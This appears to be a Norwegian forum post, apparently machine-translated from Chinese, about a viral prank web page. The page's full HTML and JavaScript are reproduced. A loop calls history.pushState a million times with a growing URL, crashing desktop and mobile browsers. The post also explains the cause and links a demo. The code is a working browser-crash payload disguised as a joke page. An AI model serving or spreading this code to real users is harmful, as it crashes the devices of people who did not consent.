|
|
Publisert på 22.01.2016 11:36:39
|
|
|
|
Årsaken til hendelsen er denne: En utenlandsk venn, Cyber Security, la ut en slik tweet på Twitter:
Denne fyren hevder at hvis du bruker den ovennevnte 12-linjers Javascrip{filter}t-koden, kan du krasje Firefox, Chrome, Safari-nettlesere, og også få iPhonen din til å starte på nytt og Android-telefonen krasje!
Den fullstendige HTML-koden er som følger:
- <html>
- <head>
- <meta charset="utf-8">
- <title>谁点谁怀孕</title>
- </head>
- <body>
- 恭喜你,你已经怀孕了!
- <scrip{过滤}t>
- var total="";
- for (var i=0;i<1000000;i++)
- {
- total= total+i.toString();
- history.pushState(0,0,total);
- }
- </scrip{过滤}t>
- </body>
- </html>
Hvis du er PC-bruker, etter å ha klikket på lenken, er det svært sannsynlig at datamaskinens CPU-minne vil stige helt til nettleseren krasjer og fryser...
Hvis du er mobilbruker (Android, iPhone), vil nettleseren krasje etter å ha klikket på lenken! Å klikke på lenken på Weibo og WeChat vil også krasje.
Hvorfor skjer dette? I denne forbindelse fant jeg et svar fra en gud ved navn "Xiaomi" på Zhihu:
history.pushstate() er et API introdusert av HTML5, pushState legger til en spesifisert URL i nettleserhistorikken og lagrer det nåværende historikkpunktet. Når i<100000, vil totalen bli registrert i nettleserhistorikken på en syklisk måte, og hvis det gjentas for mye, vil nettleseren ikke tåle det og vil naturlig krasje.
Vel, uansett, jeg klarer ikke engang å finne på «hei verden», så jeg forstår det ikke i det hele tatt... Kort sagt, det er akkurat riktig å sprenge himmelen!
Hvis du vil prøve det, vennligst klikk her: http://www.itsvse.com/demo.html
|
Foregående:[åpen kildekode] Wooyun sårbarhetsspørringsplattform kildekode pluss database asp.net versjonNeste:Linux-konfigurasjon/konfigurer/Konfigurer, lag, gjør test/gjør sjekk, sudo gjør inn...
|
